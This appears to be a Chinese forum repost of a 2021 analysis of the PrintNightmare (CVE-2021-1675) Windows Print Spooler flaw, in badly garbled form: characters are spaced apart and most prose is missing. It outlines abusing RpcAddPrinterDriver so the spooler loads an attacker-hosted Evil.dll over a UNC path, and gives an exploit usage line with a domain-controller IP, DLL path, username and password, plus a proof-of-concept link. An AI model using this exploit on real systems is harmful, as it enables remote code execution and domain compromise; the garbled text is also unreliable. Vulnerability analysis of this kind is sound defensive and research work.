搜索

[29054] 2021-07-05_【漏洞分析】PrintNightmare(CVE-2021-1675):Windows后台处理程序服务中的远程代码执行

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-07-05_【漏洞分析】PrintNightmare(CVE-2021-1675):Windows后台处理程序服务中的远程代码执行 P r i n t N i g h t m a r e   ( C V E - 2 0 2 1 - 1 6 7 5 ) W i n d o w s   O t s   2 0 2 1 - 0 7 - 0 5 O t s W i n d o w s   P r i n t e r   S p o o l e r     S t u x n e t   4 5 0 0 0   s p o o l e r     s p o o l e r     P r i n t D e m o n   M S   M S   P r i n t D e m o n     s p o o l e r     s p o o l e r     P r i n t e r   S p o o l e r     0 - d a y   B u g   P r i n t D e m o n   C V E - 2 0 2 1 - 1 6 7 5     W i n d o w s   P r i n t   S p o o l e r     M S R C   P i o t r   M a d e j   b u g   .     C V E - 2 0 2 1 - 1 6 7 5   C V E - 2 0 2 1 - 1 6 7 5     W i n d o w s   S p o o l e r     R C E     L P E     B l a c k h a t     S p o o l e r   W i n d o w s   L P E     R C E   R p c A d d P r i n t e r D r i v e r   ( R p c A d d P r i n t e r D r i v e r )   R p c A d d P r i n t e r D r i v e r     M S - R P R N O E M   C O R P S E R V T E S T C L T 1 .   使   R P C     R p c A d d P r i n t e r D r i v e r   2 .   访 使   [ M S - S M B ]   3 .     D R I V E R _ I N F O _ 2   p N a m e   =   L " O E M   " ; p E n v i r o n m e n t   =   L " W i n d o w s   N T   x 8 6 " ;   / *     * / p D r i v e r P a t h   =   " C O R P S E R V C $ D R I V E R S T A G I N G O E M D R V . D L L " ; 3 1 5   /   4 1 5 [ M S - R P R N ]   -   v 2 0 2 0 0 8 2 6   ©   2 0 2 0  
4 .   D R I V E R _ C O N T A I N E R   d r i v e r C o n t a i n e r     D R I V E R _ I N F O _ 2   5 .   R p c A d d P r i n t e r D r i v e r C V E - 2 0 2 1 - 1 6 7 5     R p c A d d P r i n t e r D r i v e r   m s d n S e L o a d D r i v e r P r i v i l e g e R P C V a l i d a t e O b j e c t A c c e s s     S p o o l e r   S e r v i c e     1 9     2 0     a 4     D C     S p o o l e r     D C     R p c A d d P r i n t e r D r i v e r     S p o o l e r     A B     C     C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 n e w C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3   C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 A . d l l     C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 C . d l l     S p o o l e r   S p o o l e r     A     C     U N C     B     U N C     p C o n f i g F i l e     U N C   e v i l d l l 使   e v i l d l l   E v i l . d l l     C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3   E v i l . d l l   R p c A d d P r i n t e r D r i v e r   p D a t a F i l e     C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 E v i l . d l l   d l l C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 A B C 访 使   ©   2 0 2 0   2 0 2 0     8     2 6   p D a t a F i l e   =   " C O R P S E R V C $ D R I V E R S T A G I N G O E M D A T A . D L L " ; p C o n f i g F i l e   =   " C O R P S E R V C $ D R I V E R S T A G I N G O E M U I . D L L " ; R p c A d d P r i n t e r D r i v e r (   L " C O R P S E R V " ,   & d r i v e r C o n t a i n e r   ) ; p D a t a F i l e   = A . d l l p C o n f i g F i l e   = a t t a c k e r i p E v i l . d l l p D r i v e r P a t h = C . d l l
  C : W i n d o w s S y s t e m 3 2 s p o o l d r i v e r s x 6 4 3 o l d 1   访   e v i l . d l l     s p o o l e r   d l l   w i n d o w s     2 0 1 9   1 8 0 9   1 7 7 6 3 . 1 5 1 8   L P E     R C E   R C E     S p o o l e r     D C     S p o o l e r     D C . P r i n t N i g h t m a r e . e x e   d c _ i p   p a t h _ t o _ e x p   u s e r _ n a m e   p a s s w o r d E x a m p l e : . P r i n t N i g h t m a r e . e x e   1 9 2 . 1 6 8 . 5 . 1 2 9   1 9 2 . 1 6 8 . 5 . 1 9 7 t e s t M y E x p l o i t . d l l   u s e r 2   t e s t 1 2 3 # #
  S p o o l e r     W i n d o w s   S p o o l e r     R C E     L P E   B l a c k h a t     S p o o l e r   W i n d o w s     L P E     R C E   h t t p s : / / g i t h u b . c o m / a f w u / P r i n t N i g h t m a r e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理